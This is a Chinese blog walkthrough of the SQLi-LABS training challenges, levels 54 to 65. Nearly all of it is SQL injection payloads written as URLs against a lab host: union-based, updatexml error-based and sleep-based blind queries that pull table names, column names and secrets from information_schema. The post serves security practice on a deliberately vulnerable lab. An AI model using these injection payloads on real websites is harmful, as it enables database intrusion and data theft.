博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
SQLi-LABS Page-4 (Challenges) Less-54-Less-65
阅读量:5095 次
发布时间:2019-06-13

本文共 4846 字,大约阅读时间需要 16 分钟。

Less-54 union - 1

http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

zgysfs4pe4

http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7a677973667334706534)--+

secret_7MLR

 http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(secret_7MLR+SEPARATOR+0x3c62723e)+FROM+zgysfs4pe4)--+

 

 

 

Less-55 union - 2

SELECT * FROM security.users WHERE id=($id) LIMIT 0,1

http://10.10.202.112/sqli/Less-55?id=-1) union select 1,2,(SELECT+GROUP_CONCAT(id,0x7e,secret_L9QL+SEPARATOR+0x3c62723e)+FROM+qqks4m1bux)--+

 

 

 

Less-56 union - 3

SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1

http://10.10.202.112/sqli/Less-56?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

j7gins5xve

 

http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6a3767696e7335787665)--+

http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(secret_IZ5L+SEPARATOR+0x3c62723e)+FROM+j7gins5xve)--+

 

Less- 57 union - 4

$id= '"'.$id.'"';

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

suhaxhpjdj

 http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x737568617868706a646a)--+

secret_091Y

 http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(secret_091Y+SEPARATOR+0x3c62723e)+FROM+suhaxhpjdj)--+

 

Less-58 报错型盲注 - 1

http://10.10.202.112/sqli/Less-58?id=1'  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

sa77s59fy3

 

http://10.10.202.112/sqli/Less-58?id=1'   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x73613737733539667933 limit 2,1)),null)--+

 

http://10.10.202.112/sqli/Less-58?id=1'    and updatexml(null,concat(0x0a,(select concat(secret_LNXT) from sa77s59fy3 limit 0,1)),null)--+

 

Less-59 报错型盲注 - 2

http://10.10.202.112/sqli/Less-59?id=1  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

6ew31kswfa

 

 http://10.10.202.112/sqli/Less-59?id=1   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x7a6c713665616533616c limit 2,1)),null)--+

http://10.10.202.112/sqli/Less-59?id=1    and updatexml(null,concat(0x0a,(select concat(secret_PCWB) from zlq6eae3al limit 0,1)),null)--+

 

Less- 60 报错型盲注 - 3

-1")--+ 进行闭合

http://10.10.202.112/sqli/Less-60?id=-1")     and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

hcgeeqbc27

http://10.10.202.112/sqli/Less-60?id=-1")      and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x68636765657162633237 limit 2,1)),null)--+

secret_6YDQ

 http://10.10.202.112/sqli/Less-60?id=-1")    and updatexml(null,concat(0x0a,(select concat(secret_6YDQ) from hcgeeqbc27 limit 0,1)),null)--+ 

 

Less 61 报错型盲注 - 4

1')) --+ 进行闭合

http://10.10.202.112/sqli/Less-61/index.php?id=1' ))   and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

aum8al0pvg

http://10.10.202.112/sqli/Less-61/index.php?id=1' ))    and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x61756d38616c30707667 limit 2,1)),null)--+

secret_8MGI

 http://10.10.202.112/sqli/Less-61/index.php?id=1' ))     and updatexml(null,concat(0x0a,(select concat(secret_8MGI) from aum8al0pvg limit 0,1)),null)--+

 

Less-62 盲注 - 1

http://10.10.202.112/sqli/Less-62?id=1') and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(5))--+

http://10.10.202.112/sqli/Less-62?id=1') and if(substr(@@version,1,1)>5,0,sleep(5))--+

Less-63 盲注 - 2

1'--+ 进行闭合

http://10.10.202.112/sqli/Less-63?id=1' and if(substr(@@version,1,1)>5,0,sleep(5))--+

 

Less-64 盲注 - 3

http://10.10.202.112/sqli/Less-64?id=1)) and if(substr(@@version,1,1)>5,0,sleep(5))--+

Less-65 盲注 - 4

http://10.10.202.112/sqli/Less-65?id=1") and if(substr(@@version,1,1)>5,0,sleep(5))--+

 

完结!!!

点击赞赏二维码,您的支持将鼓励我继续创作!

 

转载于:https://www.cnblogs.com/hack404/p/11099163.html

你可能感兴趣的文章
linux常用命令(二)
查看>>
h2database源码浅析:事务、两阶段提交
查看>>
【前端】CSS隐藏元素的方法和区别
查看>>
阿里巴巴分布式服务框架 Dubbo 团队成员梁飞专访
查看>>
python中两种方法实现二分法查找,细致分析二分法查找算法
查看>>
JavaScript的作用域链
查看>>
LeetCode--Array--Remove Duplicates from Sorted Array (Easy)
查看>>
java变量初始化
查看>>
IOS push消息的数字不减少的问题
查看>>
mysql报错Multi-statement transaction required more than 'max_binlog_cache_size' bytes of storage
查看>>
MySQL的并行复制多线程复制MTS(Multi-Threaded Slaves)
查看>>
Django中间件
查看>>
A.6-什么是“asp.net”?
查看>>
label自适应高度
查看>>
xml字符串,xml对象,数组之间的相互转化
查看>>
GitHub上的见闻
查看>>
cssText在 IE6/7/8和chrome/Firefox/IE9+的不同
查看>>
第二十五天笔记
查看>>
Java学习之Java中常用对象
查看>>
MATLAB 的日期和时间
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-11-17 04:28:16   当前IP: 3.143.1.47   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我